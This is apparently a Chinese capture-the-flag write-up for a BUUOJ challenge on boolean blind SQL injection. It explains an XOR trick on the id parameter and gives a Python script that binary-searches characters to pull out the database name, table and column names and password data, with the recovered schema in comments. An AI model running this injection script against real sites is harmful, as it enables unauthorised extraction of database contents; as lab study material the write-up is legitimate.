知识点
- 盲注
题目URL
http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1
由 1^2=3,令id=1^2成功得到id=3的页面
脚本
# -*- coding: utf-8 -*- import requests url = 'http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1' res = '' for i in range(1,500): print(i) left = 31 right = 127 mid = left + ((right - left)>>1) while left < right: #payload = "^(ascii(substr(database(),{},1))>{})".format(i,mid) #payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{},1))>{})".format(i,mid) #payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),{},1))>{})".format(i,mid) payload = "^(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i,mid) r = requests.get(url=url+payload) #print(mid) if r.status_code == 429: print('too fast') time.sleep(1) if 'NO! Not this! Click others~~~' not in r.text: left = mid + 1 elif 'NO! Not this! Click others~~~' in r.text: right = mid mid = left + ((right-left)>>1) if mid == 127 or mid == 31: break res += chr(mid) print(str(mid),res) #库 geek #表 F1naI1y,Flaaaaag #列 id,username,password id,fl4gawsl
